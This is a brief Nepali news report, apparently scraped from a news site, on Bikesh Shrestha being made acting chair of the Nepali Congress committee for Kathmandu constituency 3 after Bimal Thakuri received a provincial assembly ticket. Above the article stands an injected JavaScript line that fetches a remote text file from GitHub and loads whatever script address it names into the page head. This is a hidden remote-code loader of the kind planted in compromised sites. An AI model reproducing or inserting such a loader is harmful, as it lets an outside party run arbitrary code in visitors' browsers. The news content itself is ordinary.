;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यून, काठमाडौँ।
नेपाली कांग्रेस काठमाडौं क्षेत्र नं ३ प्रदेश (ख) को कार्यबाहक सभापति विकेश श्रेष्ठले पाएका छन्। हाल सभापती रहेका विमल ठकुरीले लिखित पत्र दिएर कार्यबाहक सभापती जिम्मा दिएका हुन् ।
विमल ठकुरीले क्षेत्र नं ३ प्रदेश (ख) बाट प्रदेश सभाको टिकेट पाए पश्चात पार्टीको गतिविधि गर्नको लागि कार्यबाहक सभापति दिएका हुन्।
कार्यवहाक सभापति विकेश श्रेष्ठ सोही कार्यसमितिको उप सभापति रहेका थिए ।
फेसबुक प्रतिक्रियाहरु